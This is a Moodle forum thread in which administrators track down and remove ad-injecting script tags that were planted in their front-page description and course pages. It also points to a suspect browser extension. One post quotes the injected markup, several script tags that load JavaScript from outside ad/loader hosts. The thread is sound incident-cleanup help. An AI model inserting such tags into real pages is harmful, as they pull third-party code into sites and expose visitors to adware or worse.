someone added adds to my moodle

Re: someone added adds to my moodle

by Jenny Watt -
Number of replies: 4

Just found it in the FrontPage settings front page description block. This is the code:

<p></p>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862" type="text/javascript"></script>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862" type="text/javascript"></script>

Still not sure how it got there in the first place, but plan to keep an eye on the site.

Average of ratings: -
In reply to Jenny Watt

Re: someone added adds to my moodle

by Emma Richardson -
Picture of Documentation writers Picture of Particularly helpful Moodlers Picture of Plugin developers
I am having this same issue but cannot find where they hid the script. I have checked the html of all the description blocks on the page and in Front Page settings but still no luck. Once you got rid of it, did it come back or did you change any security measures? I am thinking this needs to be reported.
Average of ratings: -
In reply to Jenny Watt

Re: someone added adds to my moodle

by Emma Richardson -
Picture of Documentation writers Picture of Particularly helpful Moodlers Picture of Plugin developers

I am going to post how I was able to track this down for anyone that had this problem.

I opened the Front Page and went to View Source.  Then I searched for loading-resource.

For me the script appeared between two of my course listings.  I went to the course directly above the script and found that the course was infected as well.  In the course, I also viewed source and found and deleted all three instances of the script.  

I also then changed the password of the offending teacher(!!) and notified her.

I will keep an eye on it but hope this maybe helps someone else.

Average of ratings: Useful (4)
In reply to Emma Richardson

Solved! Re: someone added adds to my moodle

by Glenys Hanson -
Hi Emma, Just to say thanks for this - I'm sure it'll be useful to many. Also to add "Solved!" to the Subject so people realise that there is a solution. Cheers, Glenys
Average of ratings: -
In reply to Jenny Watt

Re: someone added adds to my moodle

by zeinab khadem -

HI,

I am having this same problem and I foud that some browser extensions added this script in text editors , find and delete this extension.

Average of ratings: -